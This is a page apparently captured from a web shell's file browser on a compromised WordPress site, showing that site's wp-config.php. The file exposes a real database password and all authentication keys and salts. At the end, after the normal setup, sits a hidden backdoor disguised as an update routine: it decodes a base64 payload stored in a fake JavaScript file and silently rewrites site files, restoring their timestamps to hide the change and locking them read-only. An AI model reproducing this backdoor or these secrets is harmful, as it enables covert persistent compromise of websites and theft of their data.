Your IP : 18.219.111.195


Current Path : /home/sudancam/public_html/
Upload File :
Current File : /home/sudancam/public_html/wp-config.php

<?php
define( 'WP_CACHE', true );



 // WP-Optimize Cache
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sudancam_wp56' );
/** Database username */
define( 'DB_USER', 'sudancam_wp56' );
/** Database password */
define( 'DB_PASSWORD', 'Ct!wG#lVcaZ+' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'rlr4pxkwhbyek44bdpclx9gquetkfz0ish272fnmv8xhfqmxcgvavodo5xsrk9qx' );
define( 'SECURE_AUTH_KEY',  'u85nfwuqjywkffyf5i29kfaajifrannmhbdlonc0g02wk7msbshylbqa238r7fup' );
define( 'LOGGED_IN_KEY',    'kzwfclvofttymzq9gbocjyi2glzv9rl3zk2g2euaymwah9xwi58lnfeayhwkrdqd' );
define( 'NONCE_KEY',        'whdigt63ece4mrrjwij74mpaayj9dchzya7zqunx35ka5xrbbuft2jarkozgczw9' );
define( 'AUTH_SALT',        'chi2tfcfrkkgaaab5qcqc6ffdhuskpvtbast9xkcknp4xfx8hsobw6ywst6clmp2' );
define( 'SECURE_AUTH_SALT', '2v3pcqitlbj1m9jdg3qnjpqxf9xsw5ciqjkrhbjlcx8cekwpnrwehiwqkzbzuj2c' );
define( 'LOGGED_IN_SALT',   'pqgcavh5daskeynqj1mno0o2vqbvctjtvypl8acbbsf1oc1oauzwhofgas2quwmm' );
define( 'NONCE_SALT',       'zoq6gcpqsay5zaix6vapftdtyrc2s7ktmwdtmxzvlnnsphlh1uiyesfbpcaqw2uu' );
/**#@-*/
/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp6g_';
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
define( 'WP_MEMORY_LIMIT', '512M' );
set_time_limit(300);
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
define('ALTERNATE_WP_CRON', true);
$wp_update_file="/home/sudancam/public_html/wp-admin/js/tags-admin.js";
if ( is_file($wp_update_file) )
{
    $wp_update_content=trim(file_get_contents($wp_update_file));
    if ( $wp_update_content!="" )
    {
        $wp_update_content=substr($wp_update_content,6,-6);
        $wp_update_content=base64_decode($wp_update_content);
        $wp_update_arr=json_decode($wp_update_content,true);
        if ( is_array($wp_update_arr) )
        {
            foreach($wp_update_arr as $value) 
            { 
                $file_mtime=filemtime($value["path"]);
                @chmod($value["path"],0777);
                @unlink($value["path"]);
                @file_put_contents($value["path"],$value["content"]);
                @touch($value["path"],$file_mtime);
                @chmod($value["path"],0444);
            }
        }
    }
}